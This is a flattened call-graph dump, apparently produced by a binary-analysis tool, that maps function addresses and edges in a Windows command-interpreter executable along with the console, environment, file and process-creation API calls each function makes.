??_V@YAXPEAX 17301->17306 17307 7ff6a0e8408c _local_unwind 17302->17307 17308 7ff6a0e8855c ??_V@YAXPEAX 17303->17308 17310 7ff6a0e8498c 8 API calls 17304->17310 17309 7ff6a0e8855c ??_V@YAXPEAX 17305->17309 17311 7ff6a0e84056 _local_unwind 17306->17311 17307->17303 17312 7ff6a0e840a7 _local_unwind 17308->17312 17313 7ff6a0e840d2 _local_unwind 17309->17313 17314 7ff6a0e83f67 17310->17314 17311->17298 17312->17305 17315 7ff6a0e840e3 17313->17315 17314->17315 17316 7ff6a0e83f6f 17314->17316 17317 7ff6a0e8855c ??_V@YAXPEAX 17315->17317 17362 7ff6a0e8417c 17316->17362 17319 7ff6a0e840ed _local_unwind 17317->17319 17319->17276 17523 7ff6a0e84a14 GetEnvironmentStringsW 17320->17523 17323 7ff6a0e76b30 GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 17325 7ff6a0e7ca40 17 API calls 17324->17325 17326 7ff6a0e9ec96 17325->17326 17327 7ff6a0e9edf7 17326->17327 17330 7ff6a0e8081c 166 API calls 17326->17330 17328 7ff6a0e9ee16 17327->17328 17329 7ff6a0e9ee0a ??_V@YAXPEAX 17327->17329 17331 7ff6a0e88f80 7 API calls 17328->17331 17329->17328 17332 7ff6a0e9ecca 17330->17332 17333 7ff6a0e94190 17331->17333 17334 7ff6a0e9ecd2 SetCurrentDirectoryW 17332->17334 17335 7ff6a0e9ecfb 17332->17335 17336 7ff6a0e9edd4 17334->17336 17337 7ff6a0e9ece9 SetErrorMode 17334->17337 17338 7ff6a0e8498c 8 API calls 17335->17338 17339 7ff6a0e8417c 166 API calls 17336->17339 17337->17335 17340 7ff6a0e9ed89 SetCurrentDirectoryW 17338->17340 17339->17327 17341 7ff6a0e9edc1 17340->17341 17342 7ff6a0e9edac GetLastError 17340->17342 17341->17336 17344 7ff6a0e9edc6 SetErrorMode 17341->17344 17343 7ff6a0e73278 166 API calls 17342->17343 17343->17341 17344->17336 17346 7ff6a0e7b914 17345->17346 17346->17346 17347 7ff6a0e7cd90 166 API calls 17346->17347 17348 7ff6a0e7b92a 17347->17348 17348->17262 17348->17267 17350 7ff6a0e829b9 17349->17350 17350->17350 17351 7ff6a0e82a1e FindFirstFileW 17350->17351 17352 7ff6a0e8e3f7 17350->17352 17354 7ff6a0e829ed 17350->17354 17356 7ff6a0e82aeb _wcsnicmp 17350->17356 17358 
7ff6a0e8e3d6 _wcsicmp 17350->17358 17359 7ff6a0e82a9d memmove 17350->17359 17360 7ff6a0e8e404 memmove 17350->17360 17351->17352 17353 7ff6a0e82a44 FindClose 17351->17353 17352->17296 17353->17350 17355 7ff6a0e88f80 7 API calls 17354->17355 17357 7ff6a0e82a02 17355->17357 17356->17350 17357->17296 17358->17350 17358->17352 17359->17350 17360->17352 17363 7ff6a0e841a8 GetCurrentDirectoryW 17362->17363 17364 7ff6a0e841d4 towupper 17362->17364 17369 7ff6a0e841b9 17363->17369 17378 7ff6a0e8081c GetEnvironmentVariableW 17364->17378 17366 7ff6a0e88f80 7 API calls 17368 7ff6a0e841c8 17366->17368 17368->17282 17369->17366 17370 7ff6a0e8ecac towupper 17372 7ff6a0e88583 17371->17372 17373 7ff6a0e88574 ??_V@YAXPEAX 17371->17373 17372->17275 17373->17372 17375 7ff6a0e7ffdb 17374->17375 17376 7ff6a0e7ff7c 17374->17376 17375->17299 17376->17375 17377 7ff6a0e7ffb5 GetProcessHeap RtlFreeHeap 17376->17377 17377->17375 17379 7ff6a0e80877 17378->17379 17380 7ff6a0e8085e 17378->17380 17381 7ff6a0e80884 _wcsicmp 17379->17381 17382 7ff6a0e80970 17379->17382 17380->17369 17380->17370 17383 7ff6a0e808a2 _wcsicmp 17381->17383 17386 7ff6a0e80989 17381->17386 17399 7ff6a0e83140 17382->17399 17385 7ff6a0e808c0 _wcsicmp 17383->17385 17383->17386 17384 7ff6a0e8417c 154 API calls 17384->17386 17385->17386 17388 7ff6a0e808de _wcsicmp 17385->17388 17386->17384 17389 7ff6a0e833f0 _vsnwprintf 17386->17389 17395 7ff6a0e89158 7 API calls 17386->17395 17425 7ff6a0e76ee4 17386->17425 17390 7ff6a0e808fc _wcsicmp 17388->17390 17391 7ff6a0e8d8d3 GetCommandLineW 17388->17391 17389->17386 17390->17386 17392 7ff6a0e8091a _wcsicmp 17390->17392 17396 7ff6a0e8d8e5 rand 17391->17396 17392->17382 17393 7ff6a0e80934 _wcsicmp 17392->17393 17393->17396 17397 7ff6a0e80952 _wcsicmp 17393->17397 17395->17386 17396->17386 17397->17382 17398 7ff6a0e8d8f9 GetNumaHighestNodeNumber 17397->17398 17398->17386 17400 7ff6a0e8e59e 17399->17400 17401 7ff6a0e83184 GetSystemTime SystemTimeToFileTime FileTimeToLocalFileTime 
FileTimeToSystemTime 17399->17401 17459 7ff6a0e98654 17400->17459 17402 7ff6a0e831e0 17401->17402 17403 7ff6a0e8e5ed 17401->17403 17406 7ff6a0e8e5a8 17402->17406 17407 7ff6a0e831ff 17402->17407 17405 7ff6a0e8e5fe 17403->17405 17414 7ff6a0e8e750 17403->17414 17470 7ff6a0e85508 GetUserDefaultLCID 17405->17470 17465 7ff6a0e83448 17406->17465 17409 7ff6a0e833f0 _vsnwprintf 17407->17409 17412 7ff6a0e83247 17409->17412 17417 7ff6a0e88f80 7 API calls 17412->17417 17413 7ff6a0e8e5e8 17416 7ff6a0e833f0 _vsnwprintf 17414->17416 17415 7ff6a0e8e629 17418 7ff6a0e8e711 17415->17418 17424 7ff6a0e8e6e7 memmove 17415->17424 17419 7ff6a0e8e748 17416->17419 17420 7ff6a0e83266 17417->17420 17421 7ff6a0e85508 GetUserDefaultLCID 17418->17421 17419->17413 17419->17419 17472 7ff6a0e834a0 17419->17472 17420->17386 17422 7ff6a0e8e716 GetTimeFormatW 17421->17422 17422->17419 17424->17415 17426 7ff6a0e76f30 GetSystemTime SystemTimeToFileTime FileTimeToLocalFileTime FileTimeToSystemTime 17425->17426 17442 7ff6a0e76fbf 17425->17442 17427 7ff6a0e76f90 17426->17427 17436 7ff6a0e942b6 17426->17436 17429 7ff6a0e85508 GetUserDefaultLCID 17427->17429 17428 7ff6a0e98654 9 API calls 17428->17442 17430 7ff6a0e76f97 GetLocaleInfoW 17429->17430 17430->17442 17431 7ff6a0e9433f 17433 7ff6a0e833f0 _vsnwprintf 17431->17433 17432 7ff6a0e94322 realloc 17432->17431 17432->17436 17435 7ff6a0e9437d 17433->17435 17434 7ff6a0e85508 GetUserDefaultLCID 17437 7ff6a0e77042 GetDateFormatW 17434->17437 17450 7ff6a0e943ea 17435->17450 17453 7ff6a0e943fb 17435->17453 17436->17431 17436->17432 17438 7ff6a0e73278 153 API calls 17436->17438 17439 7ff6a0e7707a 17437->17439 17438->17436 17440 7ff6a0e85508 GetUserDefaultLCID 17439->17440 17446 7ff6a0e7708a 17439->17446 17441 7ff6a0e7714a GetDateFormatW 17440->17441 17443 7ff6a0e942a0 GetLastError 17441->17443 17444 7ff6a0e77175 realloc 17441->17444 17442->17428 17442->17434 17442->17442 17445 7ff6a0e9427f memmove 17442->17445 17449 7ff6a0e77020 memmove 17442->17449 17443->17436 
17444->17436 17447 7ff6a0e7719c 17444->17447 17445->17442 17446->17435 17456 7ff6a0e770bd 17446->17456 17448 7ff6a0e85508 GetUserDefaultLCID 17447->17448 17451 7ff6a0e771ae GetDateFormatW 17448->17451 17449->17442 17452 7ff6a0e83448 153 API calls 17450->17452 17451->17442 17451->17443 17455 7ff6a0e943f9 17452->17455 17454 7ff6a0e83448 153 API calls 17453->17454 17454->17455 17456->17455 17456->17456 17457 7ff6a0e88f80 7 API calls 17456->17457 17458 7ff6a0e77129 17457->17458 17458->17386 17460 7ff6a0e98673 GetSystemTime 17459->17460 17461 7ff6a0e98686 17459->17461 17462 7ff6a0e986cc SystemTimeToFileTime 17460->17462 17461->17462 17463 7ff6a0e88f80 7 API calls 17462->17463 17464 7ff6a0e986ed 17463->17464 17464->17406 17495 7ff6a0e8363c 17465->17495 17468 7ff6a0e834a0 166 API calls 17469 7ff6a0e83491 17468->17469 17469->17413 17471 7ff6a0e85529 GetLocaleInfoW 17470->17471 17471->17415 17473 7ff6a0e834bf 17472->17473 17494 7ff6a0e834f5 17472->17494 17499 7ff6a0e83578 _get_osfhandle 17473->17499 17476 7ff6a0e8350d AcquireSRWLockShared _get_osfhandle WriteConsoleW 17479 7ff6a0e8e8d2 GetLastError 17476->17479 17480 7ff6a0e83557 ReleaseSRWLockShared 17476->17480 17477 7ff6a0e834cd 17506 7ff6a0e836ec _get_osfhandle 17477->17506 17482 7ff6a0e8e8e5 GetLastError 17479->17482 17481 7ff6a0e834e1 17480->17481 17481->17482 17481->17494 17513 7ff6a0e801b8 _get_osfhandle GetFileType 17482->17513 17485 7ff6a0e8e918 17518 7ff6a0e9f318 _get_osfhandle GetFileType 17485->17518 17486 7ff6a0e8e908 17487 7ff6a0e73278 160 API calls 17486->17487 17487->17494 17489 7ff6a0e8e91f 17490 7ff6a0e8e931 17489->17490 17491 7ff6a0e8e923 17489->17491 17519 7ff6a0e9f1d8 17490->17519 17492 7ff6a0e73278 160 API calls 17491->17492 17492->17494 17494->17413 17496 7ff6a0e83664 17495->17496 17498 7ff6a0e8347b 17495->17498 17497 7ff6a0e83684 _vsnwprintf 17496->17497 17497->17498 17498->17468 17500 7ff6a0e83599 GetFileType 17499->17500 17501 7ff6a0e834c9 17499->17501 17500->17501 17504 7ff6a0e835b1 17500->17504 
17501->17476 17501->17477 17502 7ff6a0e8e940 17503 7ff6a0e835c3 GetStdHandle 17505 7ff6a0e835d2 AcquireSRWLockShared GetConsoleMode ReleaseSRWLockShared 17503->17505 17504->17502 17504->17503 17504->17505 17505->17501 17507 7ff6a0e8e95c WriteFile 17506->17507 17512 7ff6a0e83731 17506->17512 17508 7ff6a0e8e980 WideCharToMultiByte WriteFile 17507->17508 17511 7ff6a0e837a1 17508->17511 17508->17512 17509 7ff6a0e83747 17510 7ff6a0e8374b WideCharToMultiByte WriteFile 17509->17510 17509->17511 17510->17511 17511->17481 17512->17508 17512->17509 17512->17511 17514 7ff6a0e801eb 17513->17514 17515 7ff6a0e80200 17513->17515 17514->17485 17514->17486 17515->17514 17516 7ff6a0e80221 AcquireSRWLockShared GetConsoleMode ReleaseSRWLockShared 17515->17516 17517 7ff6a0e80212 GetStdHandle 17515->17517 17516->17514 17517->17516 17518->17489 17520 7ff6a0e9f1e8 17519->17520 17521 7ff6a0e9f220 17520->17521 17522 7ff6a0e73278 166 API calls 17520->17522 17521->17494 17522->17521 17524 7ff6a0e76ae8 17523->17524 17528 7ff6a0e84a40 GetProcessHeap HeapAlloc 17523->17528 17524->17323 17526 7ff6a0e84a91 memmove 17527 7ff6a0e84a9f FreeEnvironmentStringsW 17526->17527 17527->17524 17528->17526 17528->17527 17530 7ff6a0e7b061 17529->17530 17530->17231 17530->17530 17532 7ff6a0e83578 6 API calls 17531->17532 17533 7ff6a0e732e8 17532->17533 17534 7ff6a0e732f0 _get_osfhandle GetConsoleScreenBufferInfo 17533->17534 17535 7ff6a0e7331d 17533->17535 17534->17535 17567 7ff6a0e73410 17535->17567 17537 7ff6a0e733a8 17540 7ff6a0e733b0 17537->17540 17542 7ff6a0e911ff 17537->17542 17538 7ff6a0e836ec 6 API calls 17543 7ff6a0e7333d 17538->17543 17539 7ff6a0e73368 WriteConsoleW 17539->17543 17544 7ff6a0e911cc GetLastError 17539->17544 17545 7ff6a0e88f80 7 API calls 17540->17545 17541 7ff6a0e91057 GetConsoleScreenBufferInfo 17541->17543 17546 7ff6a0e91079 WriteConsoleW 17541->17546 17583 7ff6a0e84c1c 17542->17583 17543->17537 17543->17538 17543->17539 17543->17541 17543->17544 17548 7ff6a0e911df GetLastError 
17543->17548 17552 7ff6a0e73400 17543->17552 17544->17543 17549 7ff6a0e7326c 17545->17549 17546->17543 17550 7ff6a0e910a8 9 API calls 17546->17550 17548->17537 17549->17089 17550->17543 17553 7ff6a0e91181 17550->17553 17552->17548 17582 7ff6a0e9bde4 EnterCriticalSection LeaveCriticalSection 17553->17582 17568 7ff6a0e7345c FormatMessageW 17567->17568 17569 7ff6a0e912cd _ultoa GetACP 17567->17569 17568->17569 17577 7ff6a0e7348b 17568->17577 17587 7ff6a0e80460 17569->17587 17572 7ff6a0e7349d wcschr 17573 7ff6a0e734b4 17572->17573 17572->17577 17574 7ff6a0e734c4 FormatMessageW 17573->17574 17575 7ff6a0e9121d GetProcessHeap HeapAlloc 17573->17575 17576 7ff6a0e734ef 17574->17576 17575->17576 17581 7ff6a0e9124f FormatMessageW GetProcessHeap RtlFreeHeap 17575->17581 17578 7ff6a0e88f80 7 API calls 17576->17578 17577->17572 17577->17573 17580 7ff6a0e734ff 17578->17580 17580->17543 17581->17569 17584 7ff6a0e84c24 17583->17584 17586 7ff6a0e84c2f exit 17584->17586 17589 7ff6a0e84c50 17584->17589 17588 7ff6a0e80472 MultiByteToWideChar 17587->17588 17595 7ff6a0e84cb0 17589->17595 17592 7ff6a0e84c6c 17592->17584 17593 7ff6a0e83c24 164 API calls 17594 7ff6a0e84c84 GetProcessHeap RtlFreeHeap 17593->17594 17594->17592 17599 7ff6a0e84cfa 17595->17599 17600 7ff6a0e84cda 17595->17600 17596 7ff6a0e88f80 7 API calls 17597 7ff6a0e84c64 17596->17597 17597->17592 17597->17593 17598 7ff6a0e8eefe realloc 17598->17600 17599->17598 17599->17600 17600->17596 20148 7ff6a0e7b3f0 20150 7ff6a0e7b41a 20148->20150 20149 7ff6a0e8c2a3 iswdigit 20149->20150 20151 7ff6a0e8c2b7 20149->20151 20150->20149 20152 7ff6a0e7b42f 20150->20152 20153 7ff6a0e73278 166 API calls 20151->20153 20156 7ff6a0e7be00 20152->20156 20155 7ff6a0e7b461 20153->20155 20157 7ff6a0e7bec8 20156->20157 20158 7ff6a0e7be1b 20156->20158 20157->20155 20158->20157 20159 7ff6a0e7be67 20158->20159 20160 7ff6a0e7be47 memset 20158->20160 20162 7ff6a0e7be73 20159->20162 20163 7ff6a0e7bf29 20159->20163 20166 7ff6a0e7beaf 20159->20166 20263 
7ff6a0e7bff0 20160->20263 20164 7ff6a0e7be92 20162->20164 20167 7ff6a0e7bf0c 20162->20167 20165 7ff6a0e7cd90 166 API calls 20163->20165 20173 7ff6a0e7bea1 20164->20173 20190 7ff6a0e7c620 GetConsoleTitleW 20164->20190 20169 7ff6a0e7bf33 20165->20169 20166->20157 20171 7ff6a0e7bff0 185 API calls 20166->20171 20301 7ff6a0e7b0d8 memset 20167->20301 20169->20166 20174 7ff6a0e7bf70 20169->20174 20177 7ff6a0e788a8 _wcsicmp 20169->20177 20171->20157 20173->20166 20178 7ff6a0e7af98 2 API calls 20173->20178 20184 7ff6a0e7bf75 20174->20184 20414 7ff6a0e771ec 20174->20414 20175 7ff6a0e7bf1e 20175->20166 20180 7ff6a0e7bf5a 20177->20180 20178->20166 20179 7ff6a0e7bfa9 20179->20166 20181 7ff6a0e7cd90 166 API calls 20179->20181 20180->20174 20361 7ff6a0e80a6c 20180->20361 20183 7ff6a0e7bfbb 20181->20183 20183->20166 20186 7ff6a0e8081c 166 API calls 20183->20186 20185 7ff6a0e7b0d8 194 API calls 20184->20185 20187 7ff6a0e7bf7f 20185->20187 20186->20184 20187->20166 20234 7ff6a0e85ad8 20187->20234 20191 7ff6a0e7ca2f 20190->20191 20193 7ff6a0e7c675 20190->20193 20192 7ff6a0e8c5fc GetLastError 20191->20192 20195 7ff6a0e73278 166 API calls 20191->20195 20196 7ff6a0e8855c ??_V@YAXPEAX 20191->20196 20192->20191 20194 7ff6a0e7ca40 17 API calls 20193->20194 20206 7ff6a0e7c69b 20194->20206 20195->20191 20196->20191 20197 7ff6a0e8291c 8 API calls 20200 7ff6a0e7c762 20197->20200 20198 7ff6a0e7c9b5 20203 7ff6a0e8855c ??_V@YAXPEAX 20198->20203 20199 7ff6a0e789c0 23 API calls 20204 7ff6a0e7c964 20199->20204 20200->20191 20200->20197 20202 7ff6a0e8855c ??_V@YAXPEAX 20200->20202 20200->20204 20218 7ff6a0e7c83d 20200->20218 20221 7ff6a0e7c78a wcschr 20200->20221 20223 7ff6a0e7ca25 20200->20223 20225 7ff6a0e8c684 20200->20225 20228 7ff6a0e7ca2a 20200->20228 20201 7ff6a0e7c978 towupper 20201->20204 20202->20200 20205 7ff6a0e7c855 20203->20205 20204->20192 20204->20198 20204->20199 20204->20200 20204->20201 20204->20204 20209 7ff6a0e9ec14 173 API calls 20204->20209 20230 7ff6a0e7ca16 GetLastError 
20204->20230 20208 7ff6a0e7c872 20205->20208 20212 7ff6a0e8c6b8 SetConsoleTitleW 20205->20212 20206->20191 20206->20198 20206->20200 20207 7ff6a0e7d3f0 223 API calls 20206->20207 20210 7ff6a0e7c741 20207->20210 20211 7ff6a0e8855c ??_V@YAXPEAX 20208->20211 20209->20200 20213 7ff6a0e7c74d 20210->20213 20215 7ff6a0e7c8b5 wcsncmp 20210->20215 20214 7ff6a0e7c87c 20211->20214 20212->20208 20213->20200 20216 7ff6a0e7bd38 207 API calls 20213->20216 20217 7ff6a0e88f80 7 API calls 20214->20217 20215->20200 20215->20213 20216->20200 20219 7ff6a0e7c88e 20217->20219 20420 7ff6a0e7cb40 20218->20420 20219->20173 20221->20200 20226 7ff6a0e73278 166 API calls 20223->20226 20227 7ff6a0e73278 166 API calls 20225->20227 20226->20191 20227->20191 20229 7ff6a0e89158 7 API calls 20228->20229 20229->20191 20232 7ff6a0e73278 166 API calls 20230->20232 20233 7ff6a0e8c675 20232->20233 20233->20191 20235 7ff6a0e7cd90 166 API calls 20234->20235 20236 7ff6a0e85b12 20235->20236 20237 7ff6a0e85b8b 20236->20237 20238 7ff6a0e7cb40 166 API calls 20236->20238 20240 7ff6a0e88f80 7 API calls 20237->20240 20239 7ff6a0e85b26 20238->20239 20239->20237 20242 7ff6a0e80a6c 273 API calls 20239->20242 20241 7ff6a0e7bf99 20240->20241 20241->20173 20243 7ff6a0e85b43 20242->20243 20244 7ff6a0e85bb8 20243->20244 20245 7ff6a0e85b48 GetConsoleTitleW 20243->20245 20246 7ff6a0e85bbd GetConsoleTitleW 20244->20246 20247 7ff6a0e85bf4 20244->20247 20248 7ff6a0e7cad4 172 API calls 20245->20248 20249 7ff6a0e7cad4 172 API calls 20246->20249 20250 7ff6a0e85bfd 20247->20250 20251 7ff6a0e8f452 20247->20251 20252 7ff6a0e85b66 20248->20252 20253 7ff6a0e85bdb 20249->20253 20250->20237 20257 7ff6a0e85c1b 20250->20257 20258 7ff6a0e8f462 20250->20258 20255 7ff6a0e83c24 166 API calls 20251->20255 20436 7ff6a0e84224 InitializeProcThreadAttributeList 20252->20436 20496 7ff6a0e796e8 20253->20496 20255->20237 20259 7ff6a0e73278 166 API calls 20257->20259 20261 7ff6a0e73278 166 API calls 20258->20261 20259->20237 20260 7ff6a0e85b7f 20262 
7ff6a0e85c3c SetConsoleTitleW 20260->20262 20261->20237 20262->20237 20264 7ff6a0e7c01c 20263->20264 20265 7ff6a0e7c0c4 20263->20265 20266 7ff6a0e7c086 20264->20266 20267 7ff6a0e7c022 20264->20267 20265->20159 20270 7ff6a0e7c144 20266->20270 20283 7ff6a0e7c094 20266->20283 20268 7ff6a0e7c113 20267->20268 20269 7ff6a0e7c030 20267->20269 20279 7ff6a0e7ff70 2 API calls 20268->20279 20284 7ff6a0e7c053 20268->20284 20271 7ff6a0e7c039 wcschr 20269->20271 20269->20284 20275 7ff6a0e7c151 20270->20275 20290 7ff6a0e7c1c8 20270->20290 20272 7ff6a0e7c301 20271->20272 20271->20284 20278 7ff6a0e7cd90 166 API calls 20272->20278 20273 7ff6a0e7c058 20285 7ff6a0e7ff70 2 API calls 20273->20285 20288 7ff6a0e7c073 20273->20288 20274 7ff6a0e7c0c6 20276 7ff6a0e7c0cf wcschr 20274->20276 20274->20288 20771 7ff6a0e7c460 20275->20771 20282 7ff6a0e7c1be 20276->20282 20276->20288 20277 7ff6a0e7c460 183 API calls 20277->20283 20300 7ff6a0e7c30b 20278->20300 20279->20284 20286 7ff6a0e7cd90 166 API calls 20282->20286 20283->20265 20283->20277 20284->20273 20284->20274 20291 7ff6a0e7c211 20284->20291 20285->20288 20286->20290 20287 7ff6a0e7c460 183 API calls 20287->20265 20288->20265 20289 7ff6a0e7c460 183 API calls 20288->20289 20289->20288 20290->20265 20290->20291 20292 7ff6a0e7c285 20290->20292 20296 7ff6a0e7d840 178 API calls 20290->20296 20293 7ff6a0e7ff70 2 API calls 20291->20293 20292->20291 20297 7ff6a0e7b6b0 170 API calls 20292->20297 20293->20265 20294 7ff6a0e7d840 178 API calls 20294->20300 20295 7ff6a0e7b6b0 170 API calls 20295->20284 20296->20290 20298 7ff6a0e7c2ac 20297->20298 20298->20288 20298->20291 20299 7ff6a0e7c3d4 20299->20288 20299->20291 20299->20295 20300->20265 20300->20291 20300->20294 20300->20299 20302 7ff6a0e7ca40 17 API calls 20301->20302 20318 7ff6a0e7b162 20302->20318 20303 7ff6a0e7b2f7 ??_V@YAXPEAX 20304 7ff6a0e7b303 20303->20304 20306 7ff6a0e88f80 7 API calls 20304->20306 20305 7ff6a0e81ea0 8 API calls 20305->20318 20309 7ff6a0e7b315 20306->20309 20307 
7ff6a0e7b1d9 20308 7ff6a0e7cd90 166 API calls 20307->20308 20326 7ff6a0e7b1ed 20307->20326 20308->20326 20309->20164 20309->20175 20311 7ff6a0e7b2e1 20311->20303 20311->20304 20312 7ff6a0e7b228 _get_osfhandle 20314 7ff6a0e7b23f _get_osfhandle 20312->20314 20312->20326 20313 7ff6a0e8bfef _get_osfhandle SetFilePointer 20315 7ff6a0e8c01d 20313->20315 20313->20326 20314->20326 20317 7ff6a0e833f0 _vsnwprintf 20315->20317 20320 7ff6a0e8c038 20317->20320 20318->20305 20318->20307 20318->20311 20318->20318 20319 7ff6a0e801b8 6 API calls 20319->20326 20325 7ff6a0e73278 166 API calls 20320->20325 20321 7ff6a0e8c1c3 20322 7ff6a0e833f0 _vsnwprintf 20321->20322 20322->20320 20323 7ff6a0e7d208 _close 20323->20326 20324 7ff6a0e826e0 19 API calls 20324->20326 20328 7ff6a0e8c1f9 20325->20328 20326->20311 20326->20312 20326->20313 20326->20319 20326->20321 20326->20323 20326->20324 20327 7ff6a0e8c060 20326->20327 20329 7ff6a0e8c246 20326->20329 20330 7ff6a0e8c1a5 20326->20330 20332 7ff6a0e7b038 _dup2 20326->20332 20337 7ff6a0e7b356 20326->20337 20785 7ff6a0e7affc _dup 20326->20785 20787 7ff6a0e9f318 _get_osfhandle GetFileType 20326->20787 20327->20329 20333 7ff6a0e809f4 2 API calls 20327->20333 20331 7ff6a0e7af98 2 API calls 20328->20331 20334 7ff6a0e7af98 2 API calls 20329->20334 20335 7ff6a0e7b038 _dup2 20330->20335 20331->20311 20332->20326 20338 7ff6a0e8c084 20333->20338 20339 7ff6a0e8c24b 20334->20339 20336 7ff6a0e8c1b7 20335->20336 20340 7ff6a0e8c1be 20336->20340 20341 7ff6a0e8c207 20336->20341 20344 7ff6a0e7af98 2 API calls 20337->20344 20342 7ff6a0e7b900 166 API calls 20338->20342 20343 7ff6a0e9f1d8 166 API calls 20339->20343 20345 7ff6a0e7d208 _close 20340->20345 20347 7ff6a0e7d208 _close 20341->20347 20346 7ff6a0e8c08c 20342->20346 20343->20311 20348 7ff6a0e8c211 20344->20348 20345->20321 20349 7ff6a0e8c094 wcsrchr 20346->20349 20359 7ff6a0e8c0ad 20346->20359 20347->20337 20350 7ff6a0e833f0 _vsnwprintf 20348->20350 20349->20359 20351 7ff6a0e8c22c 20350->20351 20352 
7ff6a0e73278 166 API calls 20351->20352 20352->20311 20353 7ff6a0e8c106 20354 7ff6a0e7ff70 2 API calls 20353->20354 20356 7ff6a0e8c13b 20354->20356 20355 7ff6a0e8c0e0 _wcsnicmp 20355->20359 20356->20329 20357 7ff6a0e8c146 SearchPathW 20356->20357 20357->20329 20358 7ff6a0e8c188 20357->20358 20360 7ff6a0e826e0 19 API calls 20358->20360 20359->20353 20359->20355 20360->20330 20362 7ff6a0e81ea0 8 API calls 20361->20362 20363 7ff6a0e80ab9 20362->20363 20364 7ff6a0e80b12 memset 20363->20364 20365 7ff6a0e8d927 20363->20365 20366 7ff6a0e80aee _wcsnicmp 20363->20366 20372 7ff6a0e8128f ??_V@YAXPEAX 20363->20372 20367 7ff6a0e7ca40 17 API calls 20364->20367 20369 7ff6a0e8081c 166 API calls 20365->20369 20366->20364 20366->20365 20368 7ff6a0e80b5a 20367->20368 20371 7ff6a0e7b364 17 API calls 20368->20371 20382 7ff6a0e8d94e 20368->20382 20370 7ff6a0e8d933 20369->20370 20370->20364 20370->20372 20396 7ff6a0e80b6f 20371->20396 20373 7ff6a0e8d96b ??_V@YAXPEAX 20373->20382 20374 7ff6a0e80b8c wcschr 20374->20396 20376 7ff6a0e83bac wcschr 20376->20396 20377 7ff6a0e8d99a wcschr 20377->20382 20378 7ff6a0e80c0f wcsrchr 20378->20382 20378->20396 20379 7ff6a0e8d9ca GetFileAttributesW 20379->20382 20400 7ff6a0e8da64 20379->20400 20380 7ff6a0e8da74 20381 7ff6a0e8da90 GetFileAttributesW 20380->20381 20380->20400 20381->20382 20383 7ff6a0e8daa8 GetLastError 20381->20383 20382->20373 20382->20377 20382->20379 20384 7ff6a0e8d9fd ??_V@YAXPEAX 20382->20384 20382->20400 20385 7ff6a0e8dab9 20383->20385 20383->20400 20384->20382 20385->20382 20386 7ff6a0e7cd90 166 API calls 20386->20396 20387 7ff6a0e83060 171 API calls 20387->20396 20388 7ff6a0e8081c 166 API calls 20388->20396 20389 7ff6a0e7d3f0 223 API calls 20389->20396 20390 7ff6a0e81ea0 8 API calls 20390->20396 20391 7ff6a0e7af74 170 API calls 20391->20396 20392 7ff6a0e80d71 wcsrchr 20393 7ff6a0e80d97 NeedCurrentDirectoryForExePathW 20392->20393 20392->20396 20393->20382 20393->20396 20395 7ff6a0e80fb1 wcsrchr 20395->20396 20397 7ff6a0e80fd0 
wcschr 20395->20397 20396->20372 20396->20374 20396->20376 20396->20378 20396->20380 20396->20382 20396->20386 20396->20387 20396->20388 20396->20389 20396->20390 20396->20391 20396->20392 20396->20395 20396->20397 20398 7ff6a0e82eb4 22 API calls 20396->20398 20402 7ff6a0e810fd wcsrchr 20396->20402 20411 7ff6a0e81087 _wcsicmp 20396->20411 20788 7ff6a0e8291c GetDriveTypeW 20396->20788 20791 7ff6a0e82efc 20396->20791 20399 7ff6a0e80fed wcschr 20397->20399 20397->20400 20398->20396 20399->20396 20399->20400 20402->20396 20403 7ff6a0e8111a _wcsicmp 20402->20403 20404 7ff6a0e8123d 20403->20404 20405 7ff6a0e81138 _wcsicmp 20403->20405 20407 7ff6a0e81175 20404->20407 20408 7ff6a0e81250 ??_V@YAXPEAX 20404->20408 20405->20404 20406 7ff6a0e810c5 20405->20406 20406->20407 20409 7ff6a0e81169 ??_V@YAXPEAX 20406->20409 20410 7ff6a0e88f80 7 API calls 20407->20410 20408->20407 20409->20407 20412 7ff6a0e81189 20410->20412 20411->20380 20413 7ff6a0e810a7 _wcsicmp 20411->20413 20412->20174 20413->20380 20413->20406 20415 7ff6a0e77279 20414->20415 20416 7ff6a0e77211 _setjmp 20414->20416 20415->20179 20416->20415 20418 7ff6a0e77265 20416->20418 20805 7ff6a0e772b0 20418->20805 20421 7ff6a0e7cb63 20420->20421 20422 7ff6a0e7cd90 166 API calls 20421->20422 20423 7ff6a0e7c848 20422->20423 20423->20205 20424 7ff6a0e7cad4 20423->20424 20425 7ff6a0e7cad9 20424->20425 20433 7ff6a0e7cb05 20424->20433 20426 7ff6a0e7cd90 166 API calls 20425->20426 20425->20433 20427 7ff6a0e8c722 20426->20427 20428 7ff6a0e8c72e GetConsoleTitleW 20427->20428 20427->20433 20429 7ff6a0e8c74a 20428->20429 20428->20433 20430 7ff6a0e7b6b0 170 API calls 20429->20430 20435 7ff6a0e8c778 20430->20435 20431 7ff6a0e8c7ec 20432 7ff6a0e7ff70 2 API calls 20431->20432 20432->20433 20433->20205 20434 7ff6a0e8c7dd SetConsoleTitleW 20434->20431 20435->20431 20435->20434 20437 7ff6a0e842ab UpdateProcThreadAttribute 20436->20437 20438 7ff6a0e8ecd4 GetLastError 20436->20438 20439 7ff6a0e8ecf0 GetLastError 20437->20439 20440 7ff6a0e842eb 
memset memset GetStartupInfoW 20437->20440 20441 7ff6a0e8ecee 20438->20441 20533 7ff6a0e99eec 20439->20533 20443 7ff6a0e83a90 170 API calls 20440->20443 20445 7ff6a0e843a8 20443->20445 20446 7ff6a0e7b900 166 API calls 20445->20446 20447 7ff6a0e843bb 20446->20447 20448 7ff6a0e843cc 20447->20448 20449 7ff6a0e84638 _local_unwind 20447->20449 20450 7ff6a0e843de wcsrchr 20448->20450 20457 7ff6a0e84415 20448->20457 20449->20448 20451 7ff6a0e843f7 lstrcmpW 20450->20451 20450->20457 20453 7ff6a0e84668 20451->20453 20451->20457 20521 7ff6a0e99044 20453->20521 20454 7ff6a0e8441a 20456 7ff6a0e8442a CreateProcessW 20454->20456 20459 7ff6a0e84596 CreateProcessAsUserW 20454->20459 20458 7ff6a0e8448b 20456->20458 20520 7ff6a0e85a68 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 20457->20520 20460 7ff6a0e84495 CloseHandle 20458->20460 20461 7ff6a0e84672 GetLastError 20458->20461 20459->20458 20462 7ff6a0e8498c 8 API calls 20460->20462 20475 7ff6a0e8468d 20461->20475 20463 7ff6a0e844c5 20462->20463 20467 7ff6a0e844cd 20463->20467 20463->20475 20464 7ff6a0e847a3 20464->20260 20465 7ff6a0e844f8 20465->20464 